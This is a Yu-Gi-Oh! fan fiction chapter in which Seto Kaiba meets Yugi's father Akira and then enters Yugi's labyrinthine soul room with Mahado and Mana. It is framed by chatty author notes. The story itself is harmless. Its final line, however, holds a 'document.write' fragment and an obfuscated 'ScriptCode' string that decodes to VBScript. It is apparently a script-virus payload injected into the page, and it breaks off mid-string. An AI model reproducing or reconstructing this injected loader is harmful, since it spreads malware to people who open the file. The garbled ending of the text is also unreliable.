Yu-Gi-Oh! Fan Fiction ❯ Lost Identity ❯ Of hidden memories and deepest fears... ( Chapter 13 )

[ P - Pre-Teen ]

az: Hmm.... where are the reviews? I can't see them!! My... my... you guys are slacking off!! Well, my supply of good will to continue to write is diminishing.... so help!! It's hard to make a lively scene if there's nothing to liven things up. But since this chappie gonna be a dark one, I don't mind... though if you want to be my inspiration for evil thoughts, be my guest. REVIEW!!


Disclaimer: I don't own Yugioh manga nor did I own the anime spare the DVDs and my DM deck that I so much treasure until the end of time. If I OWNED Yugioh... I'd be making a fantasyland on Shadow Realms!! Huahahahahha!! Characters and original excerpts from the fic are copyrights of Kazuki Takahashi.


Chapter 13: Of hidden memories and deepest fears...

Written by Azzie/Az @ Alienna Azuani

'...Shimon-chan?', whispered Sugoroku by himself as he thought about the last time that he had heard that name uttered before him...

--Flashback (Sugoroku's POV)--

I was clinging to dear life as nothing was supporting me other than the deep void. I'm going to die..., I thought as I watched the Egyptian man walked past me. But what's this? He was crying for help!! I can't see anything... but then the voice faded...

This is the end for me. I'm going to die here. An irony for an archeologist like me...

/Shimon... here.../

I looked up towards this new voice coming from above me. A strange looking boy was holding out his hand towards me. But what struck me is that this boy was wearing the attire of the ancient Egyptian royalty!

/Shimon... I was waiting for you for so long..../

I stretched out my hand towards the boy as he pulled me out....

--End of flashback--

'..And to think about it, Yugi did looked like the boy or the young pharaoh. Why...?', mused the old man as he sauntered downstairs...

--

Kaiba's hand froze several centimeters from ringing the door as he stood still in front of Kame Game Shop. He sighed as he hesitated to leave. 'Man... I wanted to enter but I don't want him to think that I worried too much. Pish.... what should I do...', whispered Kaiba to himself as he circled around in front of the yard. But suddenly the door opened, revealing the old Mutou inside and to Seto's great surprise. The latter practically jumped several feet in shock.

'Uh... ehehe, jii-san... I just wanted to...'

'You wanted to check on Yugi, is it?..', said the old man almost tiredly. 'Very well... it's not like I can do anything to help you... Come in...', said grandpa again as Seto followed him. But the young CEO could still sense that something was wrong. 'Anything happened to Yugi? You seemed so distraught...', said Seto as the old man showed him towards the stairs. 'Yugi was upstairs in his room. You go there while I'll be down here with his mom...'

Seto frowned as he wondered what was the matter with the old guy as he went up...

--

Seto peered his head inside to find Yugi lying on the bed, face paled for some reason. 'Yugi..?', gasped Seto as he walked to his bedside. 'Yugi? Oi... wake up!! What's wrong with you.... stupid!!', said Seto again, still not noticing the presence of another man inside the room, who had been observing the whole scene at the edge of the room. Soon after, the man gave a smirk and came out from the shadows to approach the newcomer.

'You must be Seto Kaiba.... was it?', said the man as Seto jumped at the sudden intrusion. Seto turned around to face the stocky middle-aged man as he frowned at him. 'Yes... and you are...?', said Kaiba defensively as he glared at the man. How could I haven't noticed him before? Who is this...and why did I felt his presence so familiar?

The man laughed to ease the tension that had been building up. 'I'm sorry... I forgot to introduce myself. I am Akira Mutou, and I am Yugi's father.... back from Egypt. Nice to meet you... young Seto...', said Akira as he shoved a hand towards the young CEO. And I'm also someone that you once knew... can you feel it?, thought him wickedly as Kaiba accepted the handshake. 'Yugi's.... father? How... what... and how do you know my name?', gasped Seto as the man smiled apologetically.

Akira placed something on Seto's hand as he stared towards him. 'Did I startled you? Don't be afraid. So, I'll leave you two here, okay? Take care of Yugi while I go downstairs. And if you can talk to Yugi... please tell him that I'm not here to hurt him....' With that the man leave, with Seto still remained confused as he is. He looked down on his hand and realized that he was holding the sennen puzzle.

'What the...?', he gasped as he noticed that the sennen mark had been glowing dimly. Could Yugi be...., thought Seto suddenly as he took out his sennen rod. But then he looked back towards the door, where Yugi's father had went to.

How did the guy know about this...? And his words just now..., thought Seto suspiciously as he cried a curse word under his breath. 'So, here goes nothing...', hissed him as he summoned the rod's power to enter Yugi's heart. Immediately as he did, his body went limb as he lost consciousness...

'Just like I thought he would do...', suddenly a voice was heard as the person reentered the room. He placed a shawl over Seto as he adjusted the lad's sitting position to make it more comfortable. 'It makes me glad to know that the bonds between you two was still not severed...', said Akira again as he walked out from the room.

'...my dear Atemu and Seto....'

--

Kaiba opened his eyes to find himself inside a vast labyrinth, full of doors. 'This.... is Yugi's soul room?', cried Seto in surprise as another voice greeted him. 'Yeah... it is but still a lot different than before. Before this, he had two soul rooms. One just a normal one that reflected Yugi's childish innocence and sincerity and another, was sort of a maze-like tomb. That was his yami's room...But this, it has turned into one that symbolized both of the old personality. And I sensed a great confusion in him as the mazes here grew to be more twisted than before...'

Seto turned around to find two mages looking up to him. 'Mahado... Mana... do you know where..', he gasped as Mahado shook his head. Mana walked up to him. 'We've searched around and can't find him anywhere... He must have been hiding inside one of his memories...'

'But... how could this have happened...?', said Seto again as Mahado replied. 'I think he was just afraid... The puzzle sensed his fear and pulled him here where he could escape. And since this world was indeed his soul room, he can do all that he wants to prevent anyone to find him. We tried to open the doors to some of his memories but can't since they were locked...'

'But why...', said Seto again as he remembered Akira's last words. 'That man... I should have known!! Yugi must have sensed it to... Mahado, Mana... let's find him again! And this time, I won't be easy...', drawled the lad as the trio searched around for Yugi in this dizzying labyrinth of his soul....

[TBC]


az: Looked up again... it's short, but I think I'll continue in the next chapter.

az: ;P….. I'm giggling and I dunno how to say this… Perhaps this week is my lucky week among all my lucky weeks…. I got new reviews from here as well as in Mediaminers… I'm flattered… u know… I usually had an inferiority complex in my life whether at school, home or even at the net… it's really a boost when ppl do say that I had a good point… somewhere… so, Yim, KrystalStarLite, Yami Dragooness….. mina-san… arigato gozaimasu!!! I think I could still survive….

Yugi: Oh.. uh… she's sobbing, she's sobbing….

az: No I'm not, Yugi!!

Yami: Yes you are…

Az: Hey, I thought you already become one, ne….

Yami: Yup… but I'm being naughty….

Seto: See… what did I told you? ppl still luv u…

az: ;p document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs